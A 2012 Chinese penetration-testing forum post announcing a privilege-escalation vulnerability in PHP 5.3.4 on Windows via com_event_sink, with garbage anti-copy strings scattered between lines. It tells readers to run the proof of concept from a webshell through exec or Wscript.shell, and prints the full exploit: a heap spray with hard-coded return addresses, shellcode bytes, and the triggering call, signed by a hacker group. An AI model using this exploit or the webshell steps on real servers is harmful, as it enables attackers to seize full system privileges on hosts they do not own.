中国网络渗透测试联盟
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 21:08
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
, [5 J( r8 N0 q3 I5 {, D
; S2 B. G8 }% c( ]- p. d
测试方法如下:cmd /c x:\php\php.exe x:\test.php
: Z: K {5 R% u6 }
+ b$ z4 ~7 o" g0 x6 {) I
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
2 _3 Z3 A o- x
这里是两个测试的截图:
" I+ C/ @! M2 B6 }/ u' s. b, p
/ X9 D' [2 Y/ l; ]" k# {1 L
2 r# b+ N2 d' i7 T) [
% W3 y x, w' L; e# z
3 _+ l/ B5 d. O
* a0 a; ?6 e& q8 W& ]& @
成功利用此漏洞的攻击者将获得系统的最高权限
/ h5 }' B7 X. `; Y- C
& l- W& X7 w" J: _" V
: [$ v2 s( j% E( k+ [# h
! r8 Z v; ?9 ~
' b+ e' ?/ h. z5 S: M% n
. _( W! l' [4 V) `9 \
关于漏洞分析稍后附上。一下是PoC代码:
. `5 ` a9 N* Y t+ ]8 A: `
4 H' |, I( H' J9 `
<?php
2 F0 a' J1 q" [! [1 Y0 P3 e
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
. N6 N, ^, R a
//$eip ="\x44\x43\x42\x41";
/ B- o7 M, M8 V0 x' q
$eip= "\x4b\xe8\x57\x78";
+ \# W% `" R: _4 E6 a
$eax ="\x80\x01\x8d\x04";
2 w# c5 B4 B# z `8 l5 ?
$deodrant="";
( g7 n2 Q6 w! e3 z- L
$axespray = str_repeat($eip.$eax,0x80);
l- R" e% z2 K- ?! r. m. O! Q* q# b
//048d0190
& g8 T1 s9 Y' E# U* J. e
echo strlen($axespray);
' W9 g6 [) v1 k0 \2 r9 F
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
# ]/ B; T- \$ f; x! m. [+ c
echo "Silic Group Hacker Army - BlackBap.Org";
1 ^2 t3 u `* A, a% Z6 O
//19200 ==4B32 4b00
, w: _# x, a7 e# j& r( z1 L
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
% m% f9 j% Y% w0 r1 i3 s) E
$terminate = "T";
7 J6 l8 n2 X" }% X0 ]1 F4 ~
$u[] =$deodrant;
$ w0 P+ _& X1 `3 A) _
$r[] =$deodrant.$terminate;
( V6 N1 S: w% E
$a[] =$deodrant.$terminate;
' l8 S/ ~! s8 t. P4 z, q
$s[] =$deodrant.$terminate;
5 e) n8 a, N2 g) M9 x
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
; z0 \& N9 u2 c+ T( N# O) @. w+ D! J
$vVar = new VARIANT(0x048d0000+180);
0 Y( O! T7 [: ^, L9 @5 s( [
//弹窗代码(Shellcode)
$ d7 w: H0 K0 z+ o2 H% H
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
( ^1 K( a8 f1 O) `% h8 ^# ~% a( v" b
$var2 = new VARIANT(0x41414242);
4 `8 x* a( w9 O, g# y, k/ p
com_event_sink($vVar,$var2,$buffer);
% t3 ^' V5 H3 d0 Q
?>
, o- V! ?0 Y' z5 |4 U, P
[attach]113[/attach][attach]114[/attach]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2